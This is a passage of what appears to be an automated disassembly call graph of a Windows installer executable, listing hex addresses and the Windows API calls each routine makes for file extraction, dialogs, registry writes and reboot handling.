4115->4116 4117 4016d2 GetFullPathNameW 4116->4117 4118 4016ec 4117->4118 4124 40170e 4117->4124 4121 406739 2 API calls 4118->4121 4118->4124 4119 402bc2 4120 401723 GetShortPathNameW 4120->4119 4122 4016fe 4121->4122 4122->4124 4125 4063db lstrcpynW 4122->4125 4124->4119 4124->4120 4125->4124 4126 401e4e GetDC 4127 402d1c 17 API calls 4126->4127 4128 401e60 GetDeviceCaps MulDiv ReleaseDC 4127->4128 4129 402d1c 17 API calls 4128->4129 4130 401e91 4129->4130 4131 406418 17 API calls 4130->4131 4132 401ece CreateFontIndirectW 4131->4132 4133 402630 4132->4133 4134 402acf 4135 402d1c 17 API calls 4134->4135 4136 402ad5 4135->4136 4137 402b12 4136->4137 4138 402925 4136->4138 4140 402ae7 4136->4140 4137->4138 4139 406418 17 API calls 4137->4139 4139->4138 4140->4138 4142 406322 wsprintfW 4140->4142 4142->4138 4143 4020d0 4144 4020e2 4143->4144 4145 402194 4143->4145 4146 402d3e 17 API calls 4144->4146 4147 401423 24 API calls 4145->4147 4148 4020e9 4146->4148 4153 4022ee 4147->4153 4149 402d3e 17 API calls 4148->4149 4150 4020f2 4149->4150 4151 402108 LoadLibraryExW 4150->4151 4152 4020fa GetModuleHandleW 4150->4152 4151->4145 4154 402119 4151->4154 4152->4151 4152->4154 4163 40683f 4154->4163 4157 402163 4159 405443 24 API calls 4157->4159 4158 40212a 4160 401423 24 API calls 4158->4160 4161 40213a 4158->4161 4159->4161 4160->4161 4161->4153 4162 402186 FreeLibrary 4161->4162 4162->4153 4168 4063fd WideCharToMultiByte 4163->4168 4165 40685c 4166 406863 GetProcAddress 4165->4166 4167 402124 4165->4167 4166->4167 4167->4157 4167->4158 4168->4165 4169 4028d5 4170 4028dd 4169->4170 4171 4028e1 FindNextFileW 4170->4171 4173 4028f3 4170->4173 4172 40293a 4171->4172 4171->4173 4175 4063db lstrcpynW 4172->4175 4175->4173 4176 401956 4177 402d3e 17 API calls 4176->4177 4178 40195d lstrlenW 4177->4178 4179 402630 4178->4179 4180 4014d7 4181 402d1c 17 API calls 4180->4181 4182 4014dd Sleep 4181->4182 4184 402bc2 4182->4184 3441 403e58 3442 403e70 3441->3442 3443 403fab 3441->3443 3442->3443 3444 403e7c 3442->3444 3445 403ffc 3443->3445 3446 403fbc GetDlgItem GetDlgItem 3443->3446 3447 403e87 SetWindowPos 3444->3447 3448 403e9a 3444->3448 3450 404056 3445->3450 3458 401389 2 API calls 3445->3458 3449 404331 18 API calls 3446->3449 3447->3448 3451 403eb7 3448->3451 3452 403e9f ShowWindow 3448->3452 3453 403fe6 SetClassLongW 3449->3453 3454 40437d SendMessageW 3450->3454 3503 403fa6 3450->3503 3455 403ed9 3451->3455 3456 403ebf DestroyWindow 3451->3456 3452->3451 3457 40140b 2 API calls 3453->3457 3501 404068 3454->3501 3459 403ede SetWindowLongW 3455->3459 3460 403eef 3455->3460 3511 4042ba 3456->3511 3457->3445 3461 40402e 3458->3461 3459->3503 3464 403f98 3460->3464 3465 403efb GetDlgItem 3460->3465 3461->3450 3466 404032 SendMessageW 3461->3466 3462 40140b 2 API calls 3462->3501 3463 4042bc DestroyWindow EndDialog 3463->3511 3470 404398 8 API calls 3464->3470 3468 403f2b 3465->3468 3469 403f0e SendMessageW IsWindowEnabled 3465->3469 3466->3503 3467 4042eb ShowWindow 3467->3503 3472 403f38 3468->3472 3473 403f4b 3468->3473 3474 403f7f SendMessageW 3468->3474 3482 403f30 3468->3482 3469->3468 3469->3503 3470->3503 3471 406418 17 API calls 3471->3501 3472->3474 3472->3482 3477 403f53 3473->3477 3478 403f68 3473->3478 3474->3464 3475 40430a SendMessageW 3479 403f66 3475->3479 3476 404331 18 API calls 3476->3501 3518 40140b 3477->3518 3481 40140b 2 API calls 3478->3481 3479->3464 3483 403f6f 3481->3483 3482->3475 3483->3464 3483->3482 3484 404331 18 API calls 3485 4040e3 GetDlgItem 3484->3485 3486 404100 ShowWindow KiUserCallbackDispatcher 3485->3486 3487 4040f8 3485->3487 3512 404353 KiUserCallbackDispatcher 3486->3512 3487->3486 3489 40412a EnableWindow 3494 40413e 3489->3494 3490 404143 GetSystemMenu EnableMenuItem SendMessageW 3491 404173 SendMessageW 3490->3491 3490->3494 3491->3494 3494->3490 3513 404366 SendMessageW 3494->3513 3514 403e39 3494->3514 3517 4063db lstrcpynW 3494->3517 3496 4041a2 lstrlenW 3497 406418 17 API calls 3496->3497 3498 4041b8 SetWindowTextW 3497->3498 3499 401389 2 API calls 3498->3499 3499->3501 3500 4041fc DestroyWindow 3502 404216 CreateDialogParamW 3500->3502 3500->3511 3501->3462 3501->3463 3501->3471 3501->3476 3501->3484 3501->3500 3501->3503 3504 404249 3502->3504 3502->3511 3505 404331 18 API calls 3504->3505 3506 404254 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 401389 2 API calls 3506->3507 3508 40429a 3507->3508 3508->3503 3509 4042a2 ShowWindow 3508->3509 3510 40437d SendMessageW 3509->3510 3510->3511 3511->3467 3511->3503 3512->3489 3513->3494 3515 406418 17 API calls 3514->3515 3516 403e47 SetWindowTextW 3515->3516 3516->3494 3517->3496 3519 401389 2 API calls 3518->3519 3520 401420 3519->3520 3520->3482 4185 4047db 4186 404811 4185->4186 4187 4047eb 4185->4187 4189 404398 8 API calls 4186->4189 4188 404331 18 API calls 4187->4188 4190 4047f8 SetDlgItemTextW 4188->4190 4191 40481d 4189->4191 4190->4186 4192 40175c 4193 402d3e 17 API calls 4192->4193 4194 401763 4193->4194 4195 405f00 2 API calls 4194->4195 4196 40176a 4195->4196 4196->4196 4197 401d5d 4198 402d1c 17 API calls 4197->4198 4199 401d6e SetWindowLongW 4198->4199 4200 402bc2 4199->4200 4201 401ede 4202 402d1c 17 API calls 4201->4202 4203 401ee4 4202->4203 4204 402d1c 17 API calls 4203->4204 4205 401ef0 4204->4205 4206 401f07 EnableWindow 4205->4206 4207 401efc ShowWindow 4205->4207 4208 402bc2 4206->4208 4207->4208 4216 401563 4217 402b08 4216->4217 4220 406322 wsprintfW 4217->4220 4219 402b0d 4220->4219 4221 4026e4 4222 402d1c 17 API calls 4221->4222 4223 4026f3 4222->4223 4224 40273d ReadFile 4223->4224 4225 405f54 ReadFile 4223->4225 4227 402832 4223->4227 4228 40277d MultiByteToWideChar 4223->4228 4230 4027a3 SetFilePointer MultiByteToWideChar 4223->4230 4231 402843 4223->4231 4233 402830 4223->4233 4234 405fb2 SetFilePointer 4223->4234 4224->4223 4224->4233 4225->4223 4243 406322 wsprintfW 4227->4243 4228->4223 4230->4223 4232 402864 SetFilePointer 4231->4232 4231->4233 4232->4233 4235 405fce 4234->4235 4238 405fe6 4234->4238 4236 405f54 ReadFile 4235->4236 4237 405fda 4236->4237 4237->4238 4239 406017 SetFilePointer 4237->4239 4240 405fef SetFilePointer 4237->4240 4238->4223 4239->4238 4240->4239 4241 405ffa 4240->4241 4242 405f83 WriteFile 4241->4242 4242->4238 4243->4233 4244 404467 lstrcpynW lstrlenW 4245 401968 4246 402d1c 17 API calls 4245->4246 4247 40196f 4246->4247 4248 402d1c 17 API calls 4247->4248 4249 40197c 4248->4249 4250 402d3e 17 API calls 4249->4250 4251 401993 lstrlenW 4250->4251 4253 4019a4 4251->4253 4252 4019e5 4253->4252 4257 4063db lstrcpynW 4253->4257 4255 4019d5 4255->4252 4256 4019da lstrlenW 4255->4256 4256->4252 4257->4255 4258 403a68 4259 403a73 4258->4259 4260 403a7a GlobalAlloc 4259->4260 4261 403a77 4259->4261 4260->4261 4262 40166a 4263 402d3e 17 API calls 4262->4263 4264 401670 4263->4264 4265 406739 2 API calls 4264->4265 4266 401676 4265->4266 4267 4023ec 4268 402d3e 17 API calls 4267->4268 4269 4023fb 4268->4269 4270 402d3e 17 API calls 4269->4270 4271 402404 4270->4271 4272 402d3e 17 API calls 4271->4272 4273 40240e GetPrivateProfileStringW 4272->4273 3595 40176f 3596 402d3e 17 API calls 3595->3596 3597 401776 3596->3597 3598 401796 3597->3598 3599 40179e 3597->3599 3658 4063db lstrcpynW 3598->3658 3659 4063db lstrcpynW 3599->3659 3602 40179c 3606 40668a 5 API calls 3602->3606 3603 4017a9 3660 405cb0 lstrlenW CharPrevW 3603->3660 3610 4017bb 3606->3610 3611 4017cd CompareFileTime 3610->3611 3612 40188d 3610->3612 3615 4063db lstrcpynW 3610->3615 3622 406418 17 API calls 3610->3622 3628 405a41 MessageBoxIndirectW 3610->3628 3631 401864 3610->3631 3633 405eac GetFileAttributesW 3610->3633 3636 405ed1 GetFileAttributesW CreateFileW 3610->3636 3663 406739 FindFirstFileW 3610->3663 3611->3610 3613 405443 24 API calls 3612->3613 3616 401897 3613->3616 3614 405443 24 API calls 3621 401879 3614->3621 3615->3610 3637 40324c 3616->3637 3619 4018be SetFileTime 3620 4018d0 CloseHandle 3619->3620 3620->3621 3623 4018e1 3620->3623 3622->3610 3624 4018e6 3623->3624 3625 4018f9 3623->3625 3626 406418 17 API calls 3624->3626 3627 406418 17 API calls 3625->3627 3629 4018ee lstrcatW 3626->3629 3630 401901 3627->3630 3628->3610 3629->3630 3632 405a41 MessageBoxIndirectW 3630->3632 3631->3614 3631->3621 3632->3621 3634 405ecb 3633->3634 3635 405ebe SetFileAttributesW 3633->3635 3634->3610 3635->3634 3636->3610 3639 403265 3637->3639 3638 403290 3666 403431 3638->3666 3639->3638 3678 403447 SetFilePointer 3639->3678 3643 4033d1 3645 4033d5 3643->3645 3649 4033ed 3643->3649 3644 4032ad GetTickCount 3656 4032c0 3644->3656 3647 403431 ReadFile 3645->3647 3646 4018aa 3646->3619 3646->3620 3647->3646 3648 403431 ReadFile 3648->3649 3649->3646 3649->3648 3651 405f83 WriteFile 3649->3651 3650 403431 ReadFile 3650->3656 3651->3649 3653 403326 GetTickCount 3653->3656 3654 40334f MulDiv wsprintfW 3655 405443 24 API calls 3654->3655 3655->3656 3656->3646 3656->3650 3656->3653 3656->3654 3669 40694b 3656->3669 3676 405f83 WriteFile 3656->3676 3658->3602 3659->3603 3661 4017af lstrcatW 3660->3661 3662 405ccc lstrcatW 3660->3662 3661->3602 3662->3661 3664 40675a 3663->3664 3665 40674f FindClose 3663->3665 3664->3610 3665->3664 3679 405f54 ReadFile 3666->3679 3670 406970 3669->3670 3671 406978 3669->3671 3670->3656 3671->3670 3672 406a08 GlobalAlloc 3671->3672 3673 4069ff GlobalFree 3671->3673 3674 406a76 GlobalFree 3671->3674 3675 406a7f GlobalAlloc 3671->3675 3672->3670 3672->3671 3673->3672 3674->3675 3675->3670 3675->3671 3677 405fa1 3676->3677 3677->3656 3678->3638 3680 40329b 3679->3680 3680->3643 3680->3644 3680->3646 4281 4044f0 4282 404508 4281->4282 4286 404622 4281->4286 4287 404331 18 API calls 4282->4287 4283 40468c 4284 404756 4283->4284 4285 404696 GetDlgItem 4283->4285 4292 404398 8 API calls 4284->4292 4288 4046b0 4285->4288 4289 404717 4285->4289 4286->4283 4286->4284 4290 40465d GetDlgItem SendMessageW 4286->4290 4291 40456f 4287->4291 4288->4289 4297 4046d6 SendMessageW LoadCursorW SetCursor 4288->4297 4289->4284 4293 404729 4289->4293 4314 404353 KiUserCallbackDispatcher 4290->4314 4295 404331 18 API calls 4291->4295 4296 404751 4292->4296 4299 40473f 4293->4299 4300 40472f SendMessageW 4293->4300 4302 40457c CheckDlgButton 4295->4302 4318 40479f 4297->4318 4299->4296 4304 404745 SendMessageW 4299->4304 4300->4299 4301 404687 4315 40477b 4301->4315 4312 404353 KiUserCallbackDispatcher 4302->4312 4304->4296 4307 40459a GetDlgItem 4313 404366 SendMessageW 4307->4313 4309 4045b0 SendMessageW 4310 4045d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4309->4310 4311 4045cd GetSysColor 4309->4311 4310->4296 4311->4310 4312->4307 4313->4309 4314->4301 4316 404789 4315->4316 4317 40478e SendMessageW 4315->4317 4316->4317 4317->4283 4321 405a07 ShellExecuteExW 4318->4321 4320 404705 LoadCursorW SetCursor 4320->4289 4321->4320 4322 401a72 4323 402d1c 17 API calls 4322->4323 4324 401a7b 4323->4324 4325 402d1c 17 API calls 4324->4325 4326 401a20 4325->4326 3408 401573 3409 401583 ShowWindow 3408->3409 3410 40158c 3408->3410 3409->3410 3411 402bc2 3410->3411 3412 40159a ShowWindow 3410->3412 3412->3411 4327 4014f5 SetForegroundWindow 4328 402bc2 4327->4328 4329 401ff6 4330 402d3e 17 API calls 4329->4330 4331 401ffd 4330->4331 4332 406739 2 API calls 4331->4332 4333 402003 4332->4333 4335 402014 4333->4335 4336 406322 wsprintfW 4333->4336 4336->4335 4337 401b77 4338 402d3e 17 API calls 4337->4338 4339 401b7e 4338->4339 4340 402d1c 17 API calls 4339->4340 4341 401b87 wsprintfW 4340->4341 4342 402bc2 4341->4342 4343 4022f7 4344 402d3e 17 API calls 4343->4344 4345 4022fd 4344->4345 4346 402d3e 17 API calls 4345->4346 4347 402306 4346->4347 4348 402d3e 17 API calls 4347->4348 4349 40230f 4348->4349 4350 406739 2 API calls 4349->4350 4351 402318 4350->4351 4352 402329 lstrlenW lstrlenW 4351->4352 4353 40231c 4351->4353 4355 405443 24 API calls 4352->4355 4354 405443 24 API calls 4353->4354 4357 402324 4353->4357 4354->4357 4356 402367 SHFileOperationW 4355->4356 4356->4353 4356->4357 4358 404b78 4359 404ba4 4358->4359 4360 404b88 4358->4360 4362 404bd7 4359->4362 4363 404baa SHGetPathFromIDListW 4359->4363 4369 405a25 GetDlgItemTextW 4360->4369 4365 404bc1 SendMessageW 4363->4365 4366 404bba 4363->4366 4364 404b95 SendMessageW 4364->4359 4365->4362 4368 40140b 2 API calls 4366->4368 4368->4365 4369->4364 4370 406afa 4372 40697e 4370->4372 4371 4072e9 4372->4371 4373 406a08 GlobalAlloc 4372->4373 4374 4069ff GlobalFree 4372->4374 4375 406a76 GlobalFree 4372->4375 4376 406a7f GlobalAlloc 4372->4376 4373->4371 4373->4372 4374->4373 4375->4376 4376->4371 4376->4372 4377 40167b 4378 402d3e 17 API calls 4377->4378 4379 401682 4378->4379 4380 402d3e 17 API calls 4379->4380 4381 40168b 4380->4381 4382 402d3e 17 API calls 4381->4382 4383 401694 MoveFileW 4382->4383 4384 4016a7 4383->4384 4390 4016a0 4383->4390 4385 406739 2 API calls 4384->4385 4387 4022ee 4384->4387 4388 4016b6 4385->4388 4386 401423 24 API calls 4386->4387 4388->4387 4389 4061a1 36 API calls 4388->4389 4389->4390 4390->4386 4391 40237b 4392 402382 4391->4392 4396 402395 4391->4396 4393 406418 17 API calls 4392->4393 4394 40238f 4393->4394 4395 405a41 MessageBoxIndirectW 4394->4395 4395->4396 4397 4019ff 4398 402d3e 17 API calls 4397->4398 4399 401a06 4398->4399 4400 402d3e 17 API calls 4399->4400 4401 401a0f 4400->4401 4402 401a16 lstrcmpiW 4401->4402 4403 401a28 lstrcmpW 4401->4403 4404 401a1c 4402->4404 4403->4404 4405 401000 4406 401037 BeginPaint GetClientRect 4405->4406 4407 40100c DefWindowProcW 4405->4407 4409 4010f3 4406->4409 4410 401179 4407->4410 4411 401073 CreateBrushIndirect FillRect DeleteObject 4409->4411 4412 4010fc 4409->4412 4411->4409 4413 401102 CreateFontIndirectW 4412->4413 4414 401167 EndPaint 4412->4414 4413->4414 4415 401112 6 API calls 4413->4415 4414->4410 4415->4414 4416 401d81 4417 401d94 GetDlgItem 4416->4417 4418 401d87 4416->4418 4420 401d8e 4417->4420 4419 402d1c 17 API calls 4418->4419 4419->4420 4421 402d3e 17 API calls 4420->4421 4423 401dd5 GetClientRect LoadImageW SendMessageW 4420->4423 4421->4423 4424 401e33 4423->4424 4426 401e3f 4423->4426 4425 401e38 DeleteObject 4424->4425 4424->4426 4425->4426 3309 405582 3310 4055a3 GetDlgItem GetDlgItem GetDlgItem 3309->3310 3311 40572c 3309->3311 3354 404366 SendMessageW 3310->3354 3312 405735 GetDlgItem CreateThread CloseHandle 3311->3312 3313 40575d 3311->3313 3312->3313 3377 405516 OleInitialize 3312->3377 3315 405788 3313->3315 3317 405774 ShowWindow ShowWindow 3313->3317 3318 4057ad 3313->3318 3319 4057e8 3315->3319 3322 4057c2 ShowWindow 3315->3322 3323 40579c 3315->3323 3316 405613 3320 40561a GetClientRect GetSystemMetrics SendMessageW SendMessageW 3316->3320 3359 404366 SendMessageW 3317->3359 3363 404398 3318->3363 3319->3318 3327 4057f6 SendMessageW 3319->3327 3325 405688 3320->3325 3326 40566c SendMessageW SendMessageW 3320->3326 3330 4057e2 3322->3330 3331 4057d4 3322->3331 3360 40430a 3323->3360 3333 40569b 3325->3333 3334 40568d SendMessageW 3325->3334 3326->3325 3329 4057bb 3327->3329 3335 40580f CreatePopupMenu 3327->3335 3332 40430a SendMessageW 3330->3332 3336 405443 24 API calls 3331->3336 3332->3319 3355 404331 3333->3355 3334->3333 3337 406418 17 API calls 3335->3337 3336->3330 3339 40581f AppendMenuW 3337->3339 3341 40583c GetWindowRect 3339->3341 3342 40584f TrackPopupMenu 3339->3342 3340 4056ab 3343 4056b4 ShowWindow 3340->3343 3344 4056e8 GetDlgItem SendMessageW 3340->3344 3341->3342 3342->3329 3345 40586a 3342->3345 3346 4056d7 3343->3346 3347 4056ca ShowWindow 3343->3347 3344->3329 3348 40570f SendMessageW SendMessageW 3344->3348 3349 405886 SendMessageW 3345->3349 3358 404366 SendMessageW 3346->3358 3347->3346 3348->3329 3349->3349 3350 4058a3 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3349->3350 3352 4058c8 SendMessageW 3350->3352 3352->3352 3353 4058f1 GlobalUnlock SetClipboardData CloseClipboard 3352->3353 3353->3329 3354->3316 3356 406418 17 API calls 3355->3356 3357 40433c SetDlgItemTextW 3356->3357 3357->3340 3358->3344 3359->3315 3361 404311 3360->3361 3362 404317 SendMessageW 3360->3362 3361->3362 3362->3318 3364 40445b 3363->3364 3365 4043b0 GetWindowLongW 3363->3365 3364->3329 3365->3364 3366 4043c5 3365->3366 3366->3364 3367 4043f2 GetSysColor 3366->3367 3368 4043f5 3366->3368 3367->3368 3369 404405 SetBkMode 3368->3369 3370 4043fb SetTextColor 3368->3370 3371 404423 3369->3371 3372 40441d GetSysColor 3369->3372 3370->3369 3373 40442a SetBkColor 3371->3373 3374 404434 3371->3374 3372->3371 3373->3374 3374->3364 3375 404447 DeleteObject 3374->3375 3376 40444e CreateBrushIndirect 3374->3376 3375->3376 3376->3364 3384 40437d 3377->3384 3379 405539 3383 405560 3379->3383 3387 401389 3379->3387 3380 40437d SendMessageW 3381 405572 CoUninitialize 3380->3381 3383->3380 3385 404395 3384->3385 3386 404386 SendMessageW 3384->3386 3385->3379 3386->3385 3389 401390 3387->3389 3388 4013fe 3388->3379 3389->3388 3390 4013cb MulDiv SendMessageW 3389->3390 3390->3389 4427 402902 4428 402d3e 17 API calls 4427->4428 4429 402909 FindFirstFileW 4428->4429 4430 402931 4429->4430 4431 40291c 4429->4431 4435 406322 wsprintfW 4430->4435 4433 40293a 4436 4063db lstrcpynW 4433->4436 4435->4433 4436->4431 4437 402482 4438 402d3e 17 API calls 4437->4438 4439 402494 4438->4439 4440 402d3e 17 API calls 4439->4440 4441 40249e 4440->4441 4454 402dce 4441->4454 4444 4024d6 4448 402d1c 17 API calls 4444->4448 4450 4024e2 4444->4450 4445 402925 4446 402d3e 17 API calls 4447 4024cc lstrlenW 4446->4447 4447->4444 4448->4450 4449 402501 RegSetValueExW 4452 402517 RegCloseKey 4449->4452 4450->4449 4451 40324c 35 API calls 4450->4451 4451->4449 4452->4445 4455 402de9 4454->4455 4458 406276 4455->4458 4459 406285 4458->4459 4460 406290 RegCreateKeyExW 4459->4460 4461 4024ae 4459->4461 4460->4461 4461->4444 4461->4445 4461->4446 4462 401503 4463 40150b 4462->4463 4465 40151e 4462->4465 4464 402d1c 17 API calls 4463->4464 4464->4465 4473 402889 4474 402890 4473->4474 4475 402b0d 4473->4475 4476 402d1c 17 API calls 4474->4476 4477 402897 4476->4477 4478 4028a6 SetFilePointer 4477->4478 4478->4475 4479 4028b6 4478->4479 4481 406322 wsprintfW 4479->4481 4481->4475 4482 40190c 4483 401943 4482->4483 4484 402d3e 17 API calls 4483->4484 4485 401948 4484->4485 4486 405aed 67 API calls 4485->4486 4487 401951 4486->4487 3681 40348f SetErrorMode GetVersion 3682 4034ce 3681->3682 3683 4034d4 3681->3683 3684 4067d0 5 API calls 3682->3684 3685 406760 3 API calls 3683->3685 3684->3683 3686 4034ea lstrlenA 3685->3686 3686->3683 3687 4034fa 3686->3687 3688 4067d0 5 API calls 3687->3688 3689 403501 3688->3689 3690 4067d0 5 API calls 3689->3690 3691 403508 3690->3691 3692 4067d0 5 API calls 3691->3692 3694 403514 #17 OleInitialize SHGetFileInfoW 3692->3694 3771 4063db lstrcpynW 3694->3771 3696 403560 GetCommandLineW 3772 4063db lstrcpynW 3696->3772 3698 403572 3699 405cdd CharNextW 3698->3699 3700 403597 CharNextW 3699->3700 3701 4036c1 GetTempPathW 3700->3701 3711 4035b0 3700->3711 3773 40345e 3701->3773 3703 4036d9 3704 403733 DeleteFileW 3703->3704 3705 4036dd GetWindowsDirectoryW lstrcatW 3703->3705 3783 403015 GetTickCount GetModuleFileNameW 3704->3783 3708 40345e 12 API calls 3705->3708 3706 405cdd CharNextW 3706->3711 3710 4036f9 3708->3710 3709 403747 3713 4037fa 3709->3713 3717 4037ea 3709->3717 3721 405cdd CharNextW 3709->3721 3710->3704 3712 4036fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3710->3712 3711->3706 3714 4036ac 3711->3714 3716 4036aa 3711->3716 3715 40345e 12 API calls 3712->3715 3884 4039d0 3713->3884 3867 4063db lstrcpynW 3714->3867 3719 40372b 3715->3719 3716->3701 3811 403aaa 3717->3811 3719->3704 3719->3713 3738 403766 3721->3738 3724 403934 3726 4039b8 ExitProcess 3724->3726 3727 40393c GetCurrentProcess OpenProcessToken 3724->3727 3725 403814 3728 405a41 MessageBoxIndirectW 3725->3728 3732 403954 LookupPrivilegeValueW AdjustTokenPrivileges 3727->3732 3733 403988 3727->3733 3731 403822 ExitProcess 3728->3731 3729 4037c4 3868 405db8 3729->3868 3730 40382a 3736 4059ac 5 API calls 3730->3736 3732->3733 3737 4067d0 5 API calls 3733->3737 3740 40382f lstrcatW 3736->3740 3741 40398f 3737->3741 3738->3729 3738->3730 3742 403840 lstrcatW 3740->3742 3743 40384b lstrcatW lstrcmpiW 3740->3743 3744 4039a4 ExitWindowsEx 3741->3744 3747 4039b1 3741->3747 3742->3743 3743->3713 3746 403867 3743->3746 3744->3726 3744->3747 3749 403873 3746->3749 3750 40386c 3746->3750 3751 40140b 2 API calls 3747->3751 3748 4037df 3883 4063db lstrcpynW 3748->3883 3754 40598f 2 API calls 3749->3754 3753 405912 4 API calls 3750->3753 3751->3726 3755 403871 3753->3755 3756 403878 SetCurrentDirectoryW 3754->3756 3755->3756 3757 403893 3756->3757 3758 403888 3756->3758 3892 4063db lstrcpynW 3757->3892 3891 4063db lstrcpynW 3758->3891 3761 406418 17 API calls 3762 4038d2 DeleteFileW 3761->3762 3763 4038df CopyFileW 3762->3763 3768 4038a1 3762->3768 3763->3768 3764 403928 3765 4061a1 36 API calls 3764->3765 3765->3713 3767 406418 17 API calls 3767->3768 3768->3761 3768->3764 3768->3767 3769 4059c4 2 API calls 3768->3769 3770 403913 CloseHandle 3768->3770 3893 4061a1 MoveFileExW 3768->3893 3769->3768 3770->3768 3771->3696 3772->3698 3774 40668a 5 API calls 3773->3774 3776 40346a 3774->3776 3775 403474 3775->3703 3776->3775 3777 405cb0 3 API calls 3776->3777 3778 40347c 3777->3778 3779 40598f 2 API calls 3778->3779 3780 403482 3779->3780 3897 405f00 3780->3897 3901 405ed1 GetFileAttributesW CreateFileW 3783->3901 3785 403055 3804 403065 3785->3804 3902 4063db lstrcpynW 3785->3902 3787 40307b 3903 405cfc lstrlenW 3787->3903 3791 40308c GetFileSize 3792 403186 3791->3792 3806 4030a3 3791->3806 3908 402fb1 3792->3908 3794 40318f 3796 4031bf GlobalAlloc 3794->3796 3794->3804 3920 403447 SetFilePointer 3794->3920 3795 403431 ReadFile 3795->3806 3919 403447 SetFilePointer 3796->3919 3798 4031f2 3800 402fb1 6 API calls 3798->3800 3800->3804 3801 4031a8 3805 403431 ReadFile 3801->3805 3802 4031da 3803 40324c 35 API calls 3802->3803 3809 4031e6 3803->3809 3804->3709 3807 4031b3 3805->3807 3806->3792 3806->3795 3806->3798 3806->3804 3808 402fb1 6 API calls 3806->3808 3807->3796 3807->3804 3808->3806 3809->3804 3809->3809 3810 403223 SetFilePointer 3809->3810 3810->3804 3812 4067d0 5 API calls 3811->3812 3813 403abe 3812->3813 3814 403ac4 3813->3814 3815 403ad6 3813->3815 3929 406322 wsprintfW 3814->3929 3816 4062a9 3 API calls 3815->3816 3817 403b06 3816->3817 3818 403b25 lstrcatW 3817->3818 3821 4062a9 3 API calls 3817->3821 3820 403ad4 3818->3820 3921 403d80 3820->3921 3821->3818 3824 405db8 18 API calls 3825 403b57 3824->3825 3826 403beb 3825->3826 3828 4062a9 3 API calls 3825->3828 3827 405db8 18 API calls 3826->3827 3830 403bf1 3827->3830 3831 403b89 3828->3831 3829 403c01 LoadImageW 3833 403ca7 3829->3833 3834 403c28 RegisterClassW 3829->3834 3830->3829 3832 406418 17 API calls 3830->3832 3831->3826 3835 403baa lstrlenW 3831->3835 3838 405cdd CharNextW 3831->3838 3832->3829 3837 40140b 2 API calls 3833->3837 3836 403c5e SystemParametersInfoW CreateWindowExW 3834->3836 3866 403cb1 3834->3866 3839 403bb8 lstrcmpiW 3835->3839 3840 403bde 3835->3840 3836->3833 3841 403cad 3837->3841 3842 403ba7 3838->3842 3839->3840 3843 403bc8 GetFileAttributesW 3839->3843 3844 405cb0 3 API calls 3840->3844 3846 403d80 18 API calls 3841->3846 3841->3866 3842->3835 3845 403bd4 3843->3845 3847 403be4 3844->3847 3845->3840 3848 405cfc 2 API calls 3845->3848 3849 403cbe 3846->3849 3930 4063db lstrcpynW 3847->3930 3848->3840 3851 403cca ShowWindow 3849->3851 3852 403d4d 3849->3852 3854 406760 3 API calls 3851->3854 3853 405516 5 API calls 3852->3853 3855 403d53 3853->3855 3856 403ce2 3854->3856 3858 403d57 3855->3858 3859 403d6f 3855->3859 3857 403cf0 GetClassInfoW 3856->3857 3860 406760 3 API calls 3856->3860 3862 403d04 GetClassInfoW RegisterClassW 3857->3862 3863 403d1a DialogBoxParamW 3857->3863 3865 40140b 2 API calls 3858->3865 3858->3866 3861 40140b 2 API calls 3859->3861 3860->3857 3861->3866 3862->3863 3864 40140b 2 API calls 3863->3864 3864->3866 3865->3866 3866->3713 3867->3716 3932 4063db lstrcpynW 3868->3932 3870 405dc9 3871 405d5b 4 API calls 3870->3871 3872 405dcf 3871->3872 3873 4037d0 3872->3873 3874 40668a 5 API calls 3872->3874 3873->3713 3882 4063db lstrcpynW 3873->3882 3877 405ddf 3874->3877 3875 405e10 lstrlenW 3876 405e1b 3875->3876 3875->3877 3879 405cb0 3 API calls 3876->3879 3877->3873 3877->3875 3878 406739 2 API calls 3877->3878 3881 405cfc 2 API calls 3877->3881 3878->3877 3880 405e20 GetFileAttributesW 3879->3880 3880->3873 3881->3875 3882->3748 3883->3717 3885 4039e8 3884->3885 3886 4039da CloseHandle 3884->3886 3933 403a15 3885->3933 3886->3885 3891->3757 3892->3768 3894 4061c2 3893->3894 3895 4061b5 3893->3895 3894->3768 3983 406027 3895->3983 3898 405f0d GetTickCount GetTempFileNameW 3897->3898 3899 405f43 3898->3899 3900 40348d 3898->3900 3899->3898 3899->3900 3900->3703 3901->3785 3902->3787 3904 405d0a 3903->3904 3905 405d10 CharPrevW 3904->3905 3906 403081 3904->3906 3905->3904 3905->3906 3907 4063db lstrcpynW 3906->3907 3907->3791 3909 402fd2 3908->3909 3910 402fba 3908->3910 3913 402fe2 GetTickCount 3909->3913 3914 402fda 3909->3914 3911 402fc3 DestroyWindow 3910->3911 3912 402fca 3910->3912 3911->3912 3912->3794 3916 402ff0 CreateDialogParamW ShowWindow 3913->3916 3917 403013 3913->3917 3915 40680c 2 API calls 3914->3915 3918 402fe0 3915->3918 3916->3917 3917->3794 3918->3794 3919->3802 3920->3801 3922 403d94 3921->3922 3931 406322 wsprintfW 3922->3931 3924 403e05 3925 403e39 18 API calls 3924->3925 3927 403e0a 3925->3927 3926 403b35 3926->3824 3927->3926 3928 406418 17 API calls 3927->3928 3928->3927 3929->3820 3930->3826 3931->3924 3932->3870 3934 403a23 3933->3934 3935 4039ed 3934->3935 3936 403a28 FreeLibrary GlobalFree 3934->3936 3937 405aed 3935->3937 3936->3935 3936->3936 3938 405db8 18 API calls 3937->3938 3939 405b0d 3938->3939 3940 405b15 DeleteFileW 3939->3940 3941 405b2c 3939->3941 3969 403803 OleUninitialize 3940->3969 3942 405c4c 3941->3942 3973 4063db lstrcpynW 3941->3973 3949 406739 2 API calls 3942->3949 3942->3969 3944 405b52 3945 405b65 3944->3945 3946 405b58 lstrcatW 3944->3946 3948 405cfc 2 API calls 3945->3948 3947 405b6b 3946->3947 3950 405b7b lstrcatW 3947->3950 3952 405b86 lstrlenW FindFirstFileW 3947->3952 3948->3947 3951 405c71 3949->3951 3950->3952 3953 405cb0 3 API calls 3951->3953 3951->3969 3952->3942 3971 405ba8 3952->3971 3954 405c7b 3953->3954 3957 405aa5 5 API calls 3954->3957 3956 405c2f FindNextFileW 3959 405c45 FindClose 3956->3959 3956->3971 3958 405c87 3957->3958 3960 405ca1 3958->3960 3961 405c8b 3958->3961 3959->3942 3963 405443 24 API calls 3960->3963 